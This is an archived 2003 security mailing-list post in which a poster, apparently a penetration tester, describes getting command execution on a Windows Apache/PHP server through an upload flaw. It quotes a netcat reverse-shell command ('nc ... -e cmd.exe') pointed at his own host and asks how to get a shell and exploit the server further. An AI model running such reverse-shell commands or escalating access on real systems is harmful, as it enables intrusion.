From: Maarten (secfocus@hartsuijker.com)
Date: Tue Feb 18 2003 - 14:24:05 EST
Hi,
I am testing a windows based apache server, that's got php and mysql
installed on it. I found a php script that allows uploading other php
scripts. The upload directory is also readable and executable. So I have
uploaded some of my own scripts and can execute any command I want using
`cmd /c command.exe`
I am looking for ways to further exploit this server. The file system is
probably "everyone full control". Have not tested that yet. What I tried to
do was using netcat to send a command shell to my own machine (cmd /c nc
333.333.333.333 333 -e cmd.exe). I can see with tcpdump that the webserver
contacts my own machine on port 333, however, I do not get a command prompt
like I am getting when running the same netcat command from the command
prompt of a windows machine. Anyone know why?
If anyone knows an alternative to get a shell on the server, I would also
appreciate it. Of course I can run any command through php, but there should
be alternatives..... An alternative to my netcat idea is also
appreciated }-)
maarten
----------------------------------------------------------------------------
Do you know the base address of the Global Offset Table (GOT) on a Solaris 8
box?
CORE IMPACT does.
www.securityfocus.com/core
This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:53:28 EDT